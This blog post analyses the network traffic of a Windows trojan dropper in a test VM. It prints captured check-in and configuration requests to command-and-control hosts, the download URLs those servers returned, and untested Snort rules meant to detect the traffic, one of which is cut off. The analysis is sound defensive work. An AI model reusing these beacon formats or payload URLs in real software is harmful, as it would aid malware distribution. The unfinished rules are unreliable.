Home | Archive | Ask
Picture of me

a notepad of things


Text.

TrojanDropper:Win32/Microjoin.gen!C - Part 1 (Network Activity)

Some random malware I went and did a really rookie analysis on. Here’s the skinny:

filename: csrzq.exe

md5sum: aa596a067813bf44937635cd8413ddfc

At first glance of the network traffic I saw, this seemed to be a classic downloader. One of the first things it did was try to resolve “xn.bisque110.com” and proceed retrieve some sort of a config of where to potentially get more malware:

POST /yt.php HTTP/1.1

Accept: */*

Host: xn.bisque110.com

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache



HTTP/1.1 200 OK

Date: Thu, 09 Jun 2011 20:09:25 GMT

Server: Apache

Content-Length: 67

Connection: close

Content-Type: text/html



[main]
u=http://xn.bisque110.com/lf
u=http://en.bjork2.com/lf
c=/S

So, wanting to only to look at Dropper, and not the one it was requesting, I blackholed “xn.bisque110.com” and “en.bjork2.com” to see what else might happen.

The trojan then proceeded to perform some “check-in” activity, requesting “1.gif” from 122.770304123.cn, which really was just a 3 byte file with the text “ok” contained within it. Presumably to tell the trojan that there is an active connection it can proceed with using:

GET /1.gif HTTP/1.1

Accept: */*

Host: 122.770304123.cn

Connection: Keep-Alive

Cache-Control: no-cache



HTTP/1.1 200 OK

Date: Sat, 11 Jun 2011 20:01:49 GMT

Server: Apache/2.2.4 (Unix) PHP/5.2.0

Last-Modified: Mon, 27 Sep 2010 08:43:59 GMT

ETag: "4150008-3-babdb1c0"

Accept-Ranges: bytes

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: image/gif



ok

Immediate following looks to be more check-in activity, as the host makes a post with what appears to be a unique identifier for the host. The UID changed for me each time I reverted my VM snapshot and ran it again. The response, I’ve not been able to figure out yet, but it remained constant, simple text “1,2,8,4”:

POST /ue000/38sw.e?uid=276006272012936342922421 HTTP/1.1

Accept: */*

Host: 122.770304123.cn

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache



HTTP/1.1 200 OK

Date: Thu, 09 Jun 2011 23:05:48 GMT

Server: Apache/2.2.4 (Unix) PHP/5.2.0

Last-Modified: Mon, 08 Jan 2007 09:45:08 GMT

ETag: "a8217-8-48eef100"

Accept-Ranges: bytes

Content-Length: 8

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: text/plain



1,2,8,4

A couple of things to note with each of these HTTP requests is that none of them appear to be proxy-aware, as I had the VM configured to use an internal proxy. They also lack a defined user agent.

The host then switches to check-in to a different host with the same initial request, only to “110.770304123.cn”:

GET /1.gif HTTP/1.1

Accept: */*

Host: 110.770304123.cn

Connection: Keep-Alive

Cache-Control: no-cache



HTTP/1.1 200 OK

Date: Sat, 11 Jun 2011 20:01:51 GMT

Server: Apache/2.2.4 (Unix)

Last-Modified: Mon, 27 Sep 2010 08:45:41 GMT

ETag: "984395-3-c0d21740"

Accept-Ranges: bytes

Content-Length: 3

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: image/gif



ok

This time, it makes some more obviously identifiable requests, to retrieve a configuation file:

POST /player/blog.updata?v=1.5.3.8&r1=7fc558536654b7a8b29820fbe4e8ef77&tm=2010-12-08%2020:36:28&os=Windows%20XP.2600&uid=276006272012936342988806&cht=0 HTTP/1.1

Accept: */*

Host: 110.770304123.cn

Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache



HTTP/1.1 200 OK

Date: Sat, 11 Jun 2011 20:01:52 GMT

Server: Apache/2.2.4 (Unix)

Content-Length: 172

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: text/html



[login]
ip=1658837058
ar=NO
idx=http://343.boolans.com/list/2011-06-12/ALL.y
q=http://343.boolans.com/list/2011-06-12/ut_ALL.y
b=http://343.boolans.com/list/bl.y
up=
arg=/S

Picking apart the POST request we can see:

  • v=1.5.3.8 - Looks like a version number .. unsure at this point what exactly it’s a version of, though.
  • r1=7fc558536654b7a8b29820fbe4e8ef77 - Not quite sure what this is, but looks to be an md5sum of something
  • tm=2010-12-08%2020:36:28 - The local time on the machine (yes, my VM’s time is way off /eyeroll)
  • os=Windows%20XP.2600 - OS Version and build number
  • uid=276006272012936342988806 - Another unique identifier for the machine. Interestingly, it is different than the very first check-in so it must be unique to the session.
  • cht=0 - Not quite sure what this represents at this time

The data returned is a config file with login information:

  • ip=1658837058 - Appears to be a numeric representation of an IP. Drawing on some DB experience, I remembered MySQL has a function INET_ATON() which takes a string argument of an IP and converts it to a numeric value. Conversely, there is also INET_NTOA() which takes an integer argument and coverts it to an IP. So, I plugged this in, and sure enough, it was my external IP address:
mysql> select inet_ntoa(1658837058);
+-----------------------+
| inet_ntoa(1658837058) |
+-----------------------+
| 98.223.216.66         |
+-----------------------+
1 row in set (0.00 sec)
  • ar=NO - unsure what this represents currently

The next 3 lines were URLs that the host immediately proceeded to request. Interestingly, unlike previous HTTP attempts, these were all proxy-aware and went through my internal proxy set on the host. They also all reported a User-Agent, “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” which is exactly what I was running, so I suspect this was crafted from what’s stored in the registry. 

Sidebar: for a really awesome article on user agents, check out http://msdn.microsoft.com/en-us/library/ms537503(v=vs.85).aspx

All of the URLs returned “Content-Type: text/plain”, but they clearly were not. More on these in the next post.

At this point, I’ll wrap up this post with some Snort signatures I came up with (untested) that should be able to detect some of the network traffic mentioned thus far in this post:

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 1"; content:"POST|202f|yt|2e|php|20|HTTP|2f|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; sid: 9000001;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 2"; content:"POST|20|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; pcre:"/POST [^\x3f]+\x3fuid=[0-9]{20,} HTTP/i"; sid: 9000002;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 3"; content:"POST|20|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; pcre:"/POST [^\x3f]+\x3fv=[0-9.]+\x26r1=[0-9a-z]+\x26tm=[^\x26]+\x26os=[^\x26]+\x26uid=[0-9]{20,}\x26cht=[0-9] HTTP/i";sid: 9000003
(via: threatexpert.com)

    1. treyhyphen posted this